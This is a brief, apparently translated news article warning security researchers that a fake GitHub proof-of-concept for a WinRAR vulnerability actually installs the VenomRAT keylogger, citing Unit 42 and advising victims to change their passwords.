If you are still using WinRaR and looking to investigate the vulnerabilities of this data compression software, be extremely careful. A cybercriminal is currently circulating false proof-of-concept code concerning a security flaw in this program formerly present on all PCs.
According to cybersecurity researchers at Unit 42, a Github user called Whalersplonk “reused old proof-of-concept (PoC) code to quickly create a false proof of concept and push careless computer security researchers to execute malicious code. While the original PoC is supposed to expose the CVE-2023-40477 flaw allowing remote code execution through WinRaR, the code proposed by the hacker is in fact a reworked copy of another proof of concept, in Python.
To read – FBI gets trolled by one of the world’s most dangerous hackers
According to Unit 42, the fake PoC intended to exploit this WinRAR vulnerability was based on a publicly available script that exploited an SQL injection vulnerability in an application called GeoServer, listed under CVE-2023-25157. If you are a cybersecurity researcher, or simply if this field interests you, be careful to download the correct PoC when you go to Github.
This hacker tricks security researchers into installing malware on their PCs
According to researchers, Internet users who are victims of this type of attack have probably installed malware called VenomRAT (for Remote Access Trojan), and it is very possible that a hacker has taken control of your PC. Indeed, once the code is launched, “a script downloads the malware and creates a scheduled task which runs every three minutes”. VenomRAT records everything you type on the keyboard into a local file, the contents of which it sends to a remote server at regular intervals.
To read – Cybercriminals take revenge on the International Criminal Court by infiltrating its servers
Anyone who executed this fake PoC should therefore change your passwords for all sites and environments in which it has accounts.
Source: Unit 42